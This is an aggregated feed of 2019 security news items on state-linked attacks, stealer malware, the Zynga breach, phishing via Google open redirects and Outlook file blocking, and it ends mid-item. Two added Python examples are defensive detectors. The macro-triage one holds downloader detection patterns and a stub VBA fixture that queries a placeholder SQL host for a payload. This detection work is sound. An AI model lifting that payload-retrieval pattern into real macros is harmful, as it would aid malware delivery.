Riyadh, Berlin, London, and Paris also blame Tehran for the September 14 attacks, which caused severe damage to the Saudi oil sector.

Iran denied any involvement in the attacks. Immediately after the attacks, US President Donald Trump announced that his country was preparing a response; President Trump then opted for an intensification of economic sanctions against Tehran.

Military and intelligence experts believe that a Western coalition led by the US could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some Western media reported destructive cyber attacks against infrastructure in the Iranian oil sector, but Iran denied it.

“Contrary to Western media claims, investigations done today show no successful cyber attack was made on the country’s oil installations and other crucial infrastructure,” reads a statement published by the government’s cyber security office.

Despite the statement, security experts believe that a cyber offensive against Iranian infrastructure is ongoing.

Pierluigi Paganini

(SecurityAffairs – Iran, oil sector)

The post Iran’s oil minister orders ‘Full Alert’ for oil sector against attacks appeared first on Security Affairs.

Airbus Suppliers Hit in State-Sponsored Attack

Airbus has been forced to take action after a possible Chinese state-sponsored hacking operation was detected targeting multiple suppliers over the past year, according to reports.

The commercial and military aircraft-maker revealed in January that it suffered a cyber-attack resulting in unauthorized access to data, but this campaign is thought to be much bigger in scope.

Hackers have targeted UK engine-maker Rolls-Royce and French tech supplier Expleo, as well as two other French Airbus suppliers, although none of the organizations confirmed the news to AFP.

Unnamed “security sources” told the newswire that the “sophisticated” attack on the companies focused on compromising the VPNs connecting them with Airbus networks.

The sources claimed that the hackers were after technical documentation regarding the certification process for parts of Airbus aircraft, while other stolen docs indicated interest in the A400M military transport plane, and the A350 propulsion and avionics systems.

These are areas Chinese aircraft manufacturers are thought to be relatively weak in, while state-backed Comac is said to be struggling to gain certification for its C919 commercial airliner.

The notorious APT10 and the Jiangsu outpost of the Ministry of State Security, known as JSSD, have both been pegged as possible perpetrators.

“Our national security is at risk and it's well past time to address this challenge with leadership and resources,” argued Jake Olcott, VP of government affairs at BitSight. “The entire defense supply chain has been under attack for years, and it's not just the small companies that are vulnerable. Defense agencies must gain visibility immediately. We can't afford to wait.”

Ilia Kolochenko, CEO of web security firm ImmuniWeb, added that third party risk management is still at an early stage in many organizations.

“The situation is largely exacerbated by different national and regional standards and best practices, often incompatible or contrariwise overlapping,” he argued.

“Globally recognized standards, such as ISO 27001, 27701 and 9001, can definitely ensure a baseline of security, privacy and quality assurance amid suppliers. One should, however, bear in mind that they are no silver bullet and some additional monitoring of suppliers handling critical business data is a requisite.”

Microsoft to block 40+ additional file extensions in Outlook on the web

Microsoft is planning to block by default 40+ new file types in Outlook on the web to improve the security for their customers. “We took the time to audit the existing blocked file list and update it to better reflect the file types we see as risks today,” the Exchange Team noted. Outlook on the web and blocked attachments Outlook on the web, formerly Outlook Web Access (OWA), is a personal information manager web app … More

The post Microsoft to block 40+ additional file extensions in Outlook on the web appeared first on Help Net Security.

Microsoft Launches CyberPeace Institute to Tackle Attacks

Microsoft and others have launched a new non-profit which aims to reduce the “frequency, impact and scale” of cyber-attacks on citizens and critical infrastructure (CNI).

The Hewlett Foundation and Mastercard, alongside other unnamed “leading organizations,” have joined Microsoft as initial funders of the CyberPeace Institute.

Its three core functions are to: help and defend civilian victims of cyber-attacks, including by mobilizing a new CyberVolunteer Network; analyze and investigate attacks, to raise understanding and drive global accountability; and promote cybersecurity norms of responsible behavior by nation states.

“The escalating attacks we’ve seen in recent years are not just about computers attacking computers – these attacks threaten and often harm the lives and livelihoods of real people, including their ability to access basic services like health care, banking and electricity,” argued Microsoft corporate vice president, Tom Burt.

“For years, non-governmental organizations around the world have provided on-the-ground help and vocal advocacy for victims of wars and natural disasters, and have convened important discussions about protecting the victims they serve. It’s become clear that victims of attacks originating on the internet deserve similar assistance, and the CyberPeace Institute will do just that.”

The Geneva-based organization will be headed up by President Marietje Schaake, former member of the European Parliament and international policy director at Stanford University’s Cyber Policy Center, and CEO Stéphane Duguin, head of the European Internet Referral Unit at Europol.

The institute joins other recent initiatives designed to tackle the global challenge of cybercrime and incidents impacting CNI, including the Cybersecurity Tech Accord, which has signed up more than 100 companies, and the Paris Call for Trust & Security in Cyberspace, which now has signatories from 67 countries, 139 international and civil society organizations, and 358 private organizations.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at the Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .NET information-stealing malware that is easy to acquire on the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web; the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, going for just $9 on the Dark Web, and can readily be used by lower-skilled adversaries. Because of its low cost, experts believe that its popularity could increase rapidly.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system and browser information, cryptocurrency wallets, instant-messaging sessions from Telegram, Discord and Pidgin, and data (i.e. passwords, cookies and form data) from several browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V can also steal documents, collect Steam gaming community data, log detected virtual machine IPs, and grab data from FileZilla servers.

The threat actor behind Arcane Stealer V also provides dashboards and statistics to show prospective buyers of the malware the potential earnings.

When the malware runs, it collects data, takes a screenshot and then creates a text log file of what was collected.

“When run, the file collects data, takes a screenshot and then it creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. “It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack” that were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man who says he suffers from a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that, unlike other threats, the malware does not discriminate by victim geolocation and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

“Due to the lack of traversal, propagation, or destructive capabilities at the time of analysis, it is assessed with moderate confidence that this malware may not become popular with high-value and highly capable actors. However, because users can buy the source code, it is possible that we may see other threat actors reusing the malware and creating their own variant of Arcane V, as has been done with other popular malware families, like njRAT.”

Pierluigi Paganini

(SecurityAffairs – Arcane Stealer V, malware)

The post Arcane Stealer V, a threat for lower-skilled adversaries that scares experts appeared first on Security Affairs.

10 Respected Providers of IT Security Training

We at The State of Security are committed to helping aspiring information security professionals reach their full potential. Towards that end, we compiled a list of the top 10 highest paying jobs in the industry. We even highlighted the U.S. cities that tend to reward security personnel with the best salaries, amenities and other benefits. […]… Read More

The post 10 Respected Providers of IT Security Training appeared first on The State of Security.

Microsoft will add new file types to the list of blocked ones in Outlook on the Web

Microsoft announced last week it is going to expand the list of file extensions that are blocked in Outlook on the web.

Microsoft announced that it will block additional file extensions for Outlook on the web users, making it impossible for them to download attachments of these types.

Microsoft pointed out that the newly blocked file types are rarely used, so most organizations should face no problems with the change.

The list of file types that will be blocked by Microsoft includes ones used by popular programming languages, such as “.py”, “.pyc”, “.pyo”, “.pyw”, “.pyz” and “.pyzw” (used by Python); “.ps1”, “.ps1xml”, “.ps2”, “.ps2xml”, “.psc1”, “.psc2”, “.psd1”, “.psdm1”, “.cdxml” and “.pssc” (used by PowerShell); and “.jar” and “.jnlp” (used by Java).

Microsoft announced it will also block “.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab” and “.grp”.

Other file types that will be blocked by the tech giant are the ones having the “.appref-ms” extension used by Windows ClickOnce, the “.udl” extension used by Microsoft Data Access Components (MDAC), the “.wsb” extension used by Windows Sandbox, and the “.cer”, “.crt” and “.der” extensions associated with digital certificates.

“The following extensions are used by various applications.” reads the post published by Microsoft. “While the associated vulnerabilities have been patched (for years, in most cases), they are being blocked for the benefit of organizations that might still have older versions of the application software in use:

“.appcontent-ms”, “.settingcontent-ms”, “.cnt”, “.hpj”, “.website”, “.webpnp”, “.mcf”, “.printerexport”, “.pl”, “.theme”, “.vbp”, “.xbap”, “.xll”, “.xnk”, “.msu”, “.diagcab”, “.grp”

In case organizations have to allow for the use of a particular file type, admins could add specific extensions to the AllowedFileTypes property of users’ OwaMailboxPolicy objects.

“If you want a particular file type to be allowed, you can add that file type to the AllowedFileTypes property of your users’ OwaMailboxPolicy objects.” continues the post. “To add a file extension to the AllowedFileTypes list:

# Fetch the Outlook on the web mailbox policy that applies to the affected users
$policy = Get-OwaMailboxPolicy [policy name]
# AllowedFileTypes is a multi-valued property; copy it, append the extension, write it back
$allowedFileTypes = $policy.AllowedFileTypes
$allowedFileTypes.Add(".foo")
Set-OwaMailboxPolicy $policy -AllowedFileTypes $allowedFileTypes

“Security of our customers’ data is our utmost priority, and we hope our customers will understand and appreciate this change. Change can be disruptive, so we hope the information here explains what we’re doing and why,” Microsoft concludes.

Pierluigi Paganini

(SecurityAffairs – Outlook, hacking)

The post Microsoft will add new file types to the list of blocked ones in Outlook on the Web appeared first on Security Affairs.

How long before quantum computers break encryption?

The verdict is in: quantum computing poses an existential threat to asymmetric cryptography algorithms like RSA and ECC that underpin practically all current Internet security. This comes straight from the National Academy of Science’s Committee on Technical Assessment of the Feasibility and Implications of Quantum Computing. The inevitable follow-up: OK, so how much time do we have before we’re living in a post-quantum world? The short answer is, nobody knows. That’s not for lack of … More

The post How long before quantum computers break encryption? appeared first on Help Net Security.

A proactive approach to cybersecurity requires the right tools, not more tools

The key challenge facing security leaders and putting their organizations at risk of breach is misplaced confidence that the abundance of technology investments they have made has strengthened their security posture, according to a study conducted by Forrester Consulting. The study surveyed over 250 senior security decision-makers in North America and Europe. Participants included CISO, CIO, IT and security VPs from organizations ranging from 3,000 to over 25,000 employees. Currently, security leaders employ a variety … More

The post A proactive approach to cybersecurity requires the right tools, not more tools appeared first on Help Net Security.

Companies vastly overestimating their GDPR readiness, only 28% achieving compliance

Over a year on from the introduction of the General Data Protection Regulation (GDPR), the Capgemini Research Institute has found that companies vastly overestimated their readiness for the new regulation with just 28% having successfully achieved compliance. This is compared to a GDPR readiness survey last year which found that 78% expected to be prepared by the time the regulation came into effect in May 2018. However, organizations are realizing the benefits of being compliant: … More

The post Companies vastly overestimating their GDPR readiness, only 28% achieving compliance appeared first on Help Net Security.

Weekly Update 158

It's been a bit of intense country-hopping since the last update, so this one is a consolidated "this week in tweets" version. I actually found it kind of interesting going back through the noteworthy incidents of the week in lieu of having original content of my own; see what you think. Given the coming schedule (and a deep, deep desire for a few days of downtime), the next one might be more of the same, so I hope it resonates!

References

Because this week is predominantly about noteworthy tweets, I'm going to do the references a little differently. Firstly, with a sponsor shout-out:

Sponsored by Okta: You wouldn’t roll your own hashing algorithm, so why build your own auth? Secure users in mins with a free dev account.

And then the tweets I discussed themselves:

DevSecOps is emerging as the main methodology for securing cloud-native applications

Only 8 percent of companies are securing 75 percent or more of their cloud-native applications with DevSecOps practices today, with that number jumping to 68 percent of companies securing 75 percent or more of their cloud-native applications with DevSecOps practices in two years, according to ESG. The study results also revealed that API-related vulnerabilities are the top threat concern (63 percent of respondents) when it comes to organizations use of serverless. Overall, the study analyzed … More

The post DevSecOps is emerging as the main methodology for securing cloud-native applications appeared first on Help Net Security.

ThreatConnect Platform: Security insight for sound decision-making

In this interview, Jason Spies, VP of Engineering & Chief Architect, ThreatConnect, talks about the powerful features of the ThreatConnect Platform. Oftentimes, the ability for a product to support growth (scale effectively) is forgotten in lieu of a customer being dazzled by individual features or capabilities. Can you talk about the importance of technical considerations when it comes to a Platform scaling to support multiple teams and growing demands overtime? Bottom line, it’s a balance … More

The post ThreatConnect Platform: Security insight for sound decision-making appeared first on Help Net Security.

eBook: The DevOps Roadmap for Security

DevOps is concerned with uniting two particular tribes: development and operations. These tribes have seemingly competing priorities: developers value features while operations value stability. These contradictions are largely mitigated by DevOps. A strong argument could be made that the values of the security tribe – defensibility – could just as easily be brought into the fold, forming a triumvirate under the DevSecOps umbrella. The security tribe’s way forward is to find ways to unify with … More

The post eBook: The DevOps Roadmap for Security appeared first on Help Net Security.

SecTor 2019 Hack Lab Sneak Peak

Fall is officially here, and that can only mean that SecTor is right around the corner! All summer long, I’ve been planning and prepping new ideas for this year’s IoT Hack Lab and training session. With just a few weeks to go until the conference kicks off, I’m more than a little excited about the […]… Read More

The post SecTor 2019 Hack Lab Sneak Peak appeared first on The State of Security.

Ideas and Innovations at DEFCON 2019

Every year when I go to Black Hat USA and DEFCON, I am reminded of the constant battle between light and dark…wait…that’s Return of the Jedi…. I mean of the constant battle between infosec and the big bad hacker. And it’s not just the uber sophisticated hacks that involve fuzzing and SQL Injections (Am I […]… Read More

The post Ideas and Innovations at DEFCON 2019 appeared first on The State of Security.

Cloudflare now supports HTTP/3

Cloudflare, the security, performance, and reliability company helping to build a better Internet, announced support for HTTP/3, the new standard of the web that will make the Internet faster, more secure, and more reliable, for everyone. Cloudflare has been collaborating with industry peers, including Google Chrome and Mozilla Firefox, to bring HTTP/3 to the masses and progress the Internet into the future. An efficient Internet requires the adoption of common, shared protocols to allow computers … More

The post Cloudflare now supports HTTP/3 appeared first on Help Net Security.

MobileIron to offer robust security and management to Oculus for Business

MobileIron, the company that introduced the industry’s first mobile-centric, zero trust platform for the enterprise, announced support for the upcoming release of Oculus for Business. Organizations will be able to onboard, configure and manage Oculus’ leading all-in-one virtual reality (VR) headsets, Oculus Quest and Oculus Go, as part of their established unified endpoint management (UEM) infrastructure, simplifying the entire device lifecycle – from enrollment to retirement. Built for easy adoption and scalability across a variety … More

The post MobileIron to offer robust security and management to Oculus for Business appeared first on Help Net Security.

HITRUST adds new features to its information risk and compliance assessment SaaS platform

HITRUST, a leading data protection standards development and certification organization, announced a significant new release of its information risk and compliance assessment SaaS platform. HITRUST is continually innovating MyCSF to help streamline and simplify how organizations assess information risk and manage compliance. The October 2019 release features a redesigned user interface, capability to create custom assessments tailored to specific regulatory or control requirements, streamlined workflows throughout the third-party assurance process, and sharing of assessments with … More

The post HITRUST adds new features to its information risk and compliance assessment SaaS platform appeared first on Help Net Security.

Tripwire unveils new version of Tripwire Connect

Tripwire, a leading global provider of security and compliance solutions for enterprises and industrial organizations, announced the next generation of Tripwire Connect, which consolidates data from both Tripwire Enterprise and Tripwire IP360 to provide a single view of security and compliance states, and can be deployed both on-premises and as a software-as-a-service (SaaS) application. The new version of the Tripwire Connect analytics, reporting, integration and management platform delivers scalable, flexible and centralized vision into the … More

The post Tripwire unveils new version of Tripwire Connect appeared first on Help Net Security.

OPSWAT launches OPSWAT Academy, a new CIP cybersecurity training and certification program

OPSWAT, a leader in critical infrastructure protection, announced a new critical infrastructure protection (CIP) cybersecurity training and certification program, OPSWAT Academy. Designed for cybersecurity professionals and CIP stakeholders, OPSWAT Academy will provide beginner, intermediate and advanced education strategically designed to reflect the real-world responsibilities and technical proficiencies required of modern-day critical infrastructure security professionals and stakeholders. Through courses that promote best practices and practical approaches to CIP cybersecurity, OPSWAT Academy will help properly prime what … More

The post OPSWAT launches OPSWAT Academy, a new CIP cybersecurity training and certification program appeared first on Help Net Security.

Phishers continue to abuse Adobe and Google Open Redirects

Adobe and Google Open Redirects Abused by Phishing Campaigns

Experts reported that phishing campaigns are leveraging Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Phishers are abusing Google and Adobe open redirects to bypass spam filters and redirect users to malicious sites.

Crooks abuse Google and Adobe services to create URLs that point to malicious websites yet still bypass security filters, because they appear to be legitimate URLs from trusted IT giants.

“Open redirectors take you from a Google URL to another website chosen by whoever constructed the link. Some members of the security community argue that the redirectors aid phishing, because users may be inclined to trust the mouse hover tooltip on a link and then fail to examine the address bar once the navigation takes place,” reads the post published by Google.

“Our take on this is that tooltips are not a reliable security indicator, and can be tampered with in many ways; so, we invest in technologies to detect and alert users about phishing and abuse, but we generally hold that a small number of properly monitored offers fairly clear benefits and poses very little practical risk.”

An example of a Google open redirect that could be abused by attackers is https://www.google.com/url?q=[url], where the q parameter carries the destination the user is sent to.
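As an added example (not from the article, Google or BleepingComputer), the Python below shows the check a mail filter or an analyst can apply to such links: it recognises the redirector form cited above, https://www.google.com/url?q=<destination>, pulls the destination out of the q parameter and compares the host the browser ends up on with the google.com host the hover tooltip shows. Only the Google endpoint is listed; the Adobe service would be added in the same table once its parameter name is known. The message body and destination domain (using the reserved .test TLD) are constructed.

```python
"""Flag links that pass through a trusted-domain open redirector.
Added example, not from the article, Google or BleepingComputer. Judges a link by the
host it finally lands on rather than by the host shown in the tooltip."""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Known redirector endpoints -> query parameter that carries the destination.
# Only the Google form from the article is listed; other services are added the same way.
REDIRECTORS = {
    ("www.google.com", "/url"): "q",
    ("google.com", "/url"): "q",
}

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def redirect_target(url: str):
    """Return the destination URL if `url` is a known open-redirect link, else None."""
    p = urlparse(url)
    param = REDIRECTORS.get((p.netloc.lower(), p.path))
    if param is None:
        return None
    values = parse_qs(p.query).get(param)
    return unquote(values[0]) if values else None


def registrable_base(host: str) -> str:
    """Naive eTLD+1 ('docs.google.com' -> 'google.com'); sufficient for this demo."""
    return ".".join(host.split(".")[-2:])


def assess_link(url: str) -> dict:
    """Describe a link: the host a user sees and the host the browser ends up on."""
    shown_host = urlparse(url).netloc.lower()
    target = redirect_target(url)
    if target is None:
        return {"url": url, "redirect": False, "shown_host": shown_host,
                "final_host": shown_host, "suspicious": False}
    final_host = urlparse(target).netloc.lower()
    # The abuse case: the tooltip says google.com, the destination is an unrelated domain.
    base = registrable_base(shown_host)
    same_site = final_host == base or final_host.endswith("." + base)
    return {"url": url, "redirect": True, "shown_host": shown_host,
            "final_host": final_host, "suspicious": bool(final_host) and not same_site}


def scan_email_body(text: str) -> list:
    """Extract every URL from a message body and assess it."""
    links = [m.group(0).rstrip(".,;:)") for m in URL_RE.finditer(text)]
    return [assess_link(u) for u in links]


if __name__ == "__main__":
    # Constructed phishing-style body; the destination domain uses the reserved .test TLD.
    body = ("Your mailbox is full. Review it here: "
            "https://www.google.com/url?q=https%3A%2F%2Flogin-example.test%2Fsignin. "
            "Docs: https://www.google.com/url?q=https://docs.google.com/document/d/abc")
    for r in scan_email_body(body):
        print(f"{'SUSPICIOUS' if r['suspicious'] else 'ok':10} {r['shown_host']} -> {r['final_host']}")
```

A redirect whose destination stays inside the trusted domain (a docs.google.com link) is not flagged, which keeps the check from drowning analysts in legitimate Google-generated links; it is the change of registrable domain between tooltip and landing page that carries the signal.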

“Phishing campaigns commonly utilize open redirects from well known companies as they feel users will be more likely to click on a link if it belongs to Google or Adobe,” reported BleepingComputer.

Below is an example of a phishing message that uses a Google open redirect pointing to a fake login page.

In a similar way, attackers could abuse the Adobe redirect service in phishing campaigns.

Experts suggest that administrators and users remain vigilant about open redirects.

Pierluigi Paganini

(SecurityAffairs – google open redirects, phishing)


The post Phishers continue to abuse Adobe and Google Open Redirects appeared first on Security Affairs.

Windows 10 1903 on ARM Gets a Virtualization-based Security Feature

Windows 10 version 1903 on ARM has gotten an additional virtualization-based security feature that creates secured regions of memory that are isolated from the operating system. These secured and isolated regions of memory can then be used by security solutions so that they are better protected from vulnerabilities in the operating s [...]

Week in review: IE zero-day, S3 bucket security, rise of RDP as a target vector

Here’s an overview of some of last week’s most interesting news, articles and podcasts: Cybersecurity automation? Yes, wherever possible Automated systems are invaluable when it comes to performing asset discovery, evaluation and vulnerability remediation, sifting through mountains of data, detecting anomalous activity and, consequently, alleviating the everyday burdens of security teams. How can we thwart email-based social engineering attacks? More than 99 percent of cyberattacks rely on human interaction to work, Proofpoint recently shared. More … More

The post Week in review: IE zero-day, S3 bucket security, rise of RDP as a target vector appeared first on Help Net Security.

Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs



Hi folks, let me inform you that I suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? What’s Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence’s report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attacks in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid on network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 233 appeared first on Security Affairs.

Security Affairs 2019-09-29 06:48:05

Hackers have stolen more than 218 million records from the popular ‘Words With Friends’ developed by the mobile social game company Zynga Inc.

Do you remember Gnosticplayers? Between February and April, the popular hacker Gnosticplayers disclosed the existence of some massive unreported data breaches in five rounds, offering for sale almost a billion user records stolen from nearly 45 popular online services.

Now the Pakistani hacker claims to have stolen more than 218 million records from the popular mobile social game company Zynga Inc.

Zynga Inc is an American social game developer founded in April 2007 that runs social video game services; it primarily focuses on mobile and social networking platforms.

Among the online games developed by the company are FarmVille, Words With Friends, Zynga Poker, Mafia Wars and Café World, which together have over a billion players worldwide.

“Going by the online alias Gnosticplayers, the serial hacker told The Hacker News that this time, he managed to breach “Words With Friends,” a popular Zynga-developed word puzzle game, and unauthorisedly access a massive database of more than 218 million users.” reported The Hacker News.

Gnosticplayers shared a sample of the stolen data with The Hacker News; the exposed records include:

  • Names
  • Email addresses
  • Login IDs
  • Hashed passwords, SHA1 with salt
  • Password reset token (if ever requested)
  • Phone numbers (if provided)
  • Facebook ID (if connected)
  • Zynga account ID

Gnosticplayers revealed that he had access to data belonging to all Android and iOS game players who installed and signed up for the ‘Words With Friends’ game before 2nd September 2019.

Zynga confirmed that account login information for certain players of Draw Something and Words With Friends may have been exposed in the data breach. The company pointed out that the hackers did not access financial information.

“We recently discovered that certain player account information may have been illegally accessed by outside hackers.  An investigation was immediately commenced, leading third-party forensics firms were retained to assist, and we have contacted law enforcement.” reads the data breach notification published by the company.

“While the investigation is ongoing, we do not believe any financial information was accessed.  However, we have identified account login information for certain players of Draw Something and Words With Friends that may have been accessed.  As a precaution, we have taken steps to protect these users’ accounts from invalid logins.  We plan to further notify players as the investigation proceeds.”

The hacker also claims to have accessed data of other Zynga gamers, including Draw Something and the discontinued OMGPOP game.

The company launched an investigation and hired third-party forensics firms to assist; it also reported the incident to law enforcement. As a precaution, the gaming firm has taken steps to protect the affected users’ accounts from invalid logins.

Users of the Words With Friends game, and I would suggest players of any Zynga game, should immediately change their account password, and also change it on any other service where they reuse the same credentials.

Pierluigi Paganini

(SecurityAffairs – gaming, hacking)

The post appeared first on Security Affairs.

Exclusive — Hacker Steals Over 218 Million Zynga ‘Words with Friends’ Gamers Data

A Pakistani hacker who previously made headlines earlier this year for selling almost a billion user records stolen from nearly 45 popular online services has now claimed to have hacked the popular mobile social game company Zynga Inc. With a current market capitalization of over $5 billion, Zynga is one of the world's most successful social game developers with a collection of hit online

WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a downloader, dubbed WhiteShadow, that uses Microsoft SQL queries to pull and deliver malicious payloads.

In August, malware researchers at Proofpoint spotted a new downloader being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros, which collectively act as a staged downloader, and tracked them as WhiteShadow.

Initially the downloader was involved in a small campaign aimed at distributing the Crimson RAT; over time, researchers observed the addition of detection evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enabled, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by the threat actors.

The result of the query is written to disk as a PKZip archive of a Windows executable. 

“WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office,” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”
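As an added example (not Proofpoint's tooling and not from the article), here is a small Python triage script for the macro traits the report describes: a SQLOLEDB connection string, ADODB objects issuing a query, a zip archive written to disk, and StrReverse obfuscation. It first resolves StrReverse("...") literals and folds case, so the cheap obfuscations the analysis mentions do not hide the indicators, and then scores the macro text. The VBA snippet inside it is a constructed, non-functional fixture written only to exercise the matcher, not a real WhiteShadow sample, and the indicator weights and threshold are my own choices.

```python
"""Heuristic triage of VBA macro text for the WhiteShadow traits described above.
Added example, not Proofpoint's code. The sample macros are constructed fixtures."""
import re

STRREVERSE_RE = re.compile(r'StrReverse\(\s*"([^"]*)"\s*\)', re.IGNORECASE)


def normalise_macro(src: str) -> str:
    """Undo the two cheap obfuscations the article mentions: resolve StrReverse("...")
    literals so the real string is visible, then fold case ("Full_fILE" -> "full_file")."""
    resolved = STRREVERSE_RE.sub(lambda m: '"' + m.group(1)[::-1] + '"', src)
    return resolved.lower()


# (name, regex, weight, match against the raw text instead of the normalised text)
INDICATORS = [
    ("sqloledb_provider",      r"provider\s*=\s*sqloledb",                     3, False),
    ("adodb_object",           r"adodb\.(connection|recordset)",               2, False),
    ("sql_query",              r"\bselect\b.+\bfrom\b",                        1, False),
    ("zip_on_disk",            r"\.zip\b",                                     1, False),
    ("shell_namespace_unzip",  r"namespace\(",                                 1, False),
    ("strreverse_obfuscation", r"strreverse\(",                                2, True),
    ("autorun_entry_point",    r"\b(auto_open|document_open|workbook_open)\b", 1, False),
]
SUSPICIOUS_THRESHOLD = 5   # my choice: provider + query + obfuscation comfortably exceeds it


def triage_macro(src: str) -> dict:
    """Return the matched indicator names, their summed weight and a verdict."""
    raw, norm = src.lower(), normalise_macro(src)
    hits = [(name, weight) for name, pattern, weight, on_raw in INDICATORS
            if re.search(pattern, raw if on_raw else norm)]
    score = sum(weight for _, weight in hits)
    return {"hits": [name for name, _ in hits], "score": score,
            "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign"}


# Constructed fixture mirroring the described traits; not a functioning downloader.
SAMPLE_MACRO = r'''
Sub Document_Open()
    Dim cn As Object, rs As Object
    Set cn = CreateObject("ADODB.Connection")
    cn.Open "Provider=SQLOLEDB;Data Source=db.invalid;User ID=u;Password=p;"
    Set rs = cn.Execute("SELECT payload FROM staging")
    Dim out As String
    out = StrReverse("piz.Updates\stnemucoD\")
    ' write / extract / run steps intentionally omitted from this fixture
End Sub
'''

# Constructed benign macro: an autorun entry point alone should not trip the verdict.
BENIGN_MACRO = r'''
Sub Auto_Open()
    Range("A1").Value = "Report generated"
End Sub
'''

if __name__ == "__main__":
    for label, macro in (("fixture", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(label, triage_macro(macro))
```

Resolving StrReverse before matching is the step that matters: on the raw text the path literal quoted in the analysis reads as gibberish, while after reversal it is a plain `\Documents\...zip` path that a `.zip` indicator catches. The randomised-string variants the report mentions last would still need a different approach, such as entropy of identifier names, which this script does not attempt.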

Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)

The post WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware appeared first on Security Affairs.

Masad Stealer Malware exfiltrates data via Telegram

Experts at Juniper Threat Labs have discovered a new piece of malware dubbed Masad Stealer that exfiltrates cryptocurrency wallet files via Telegram.

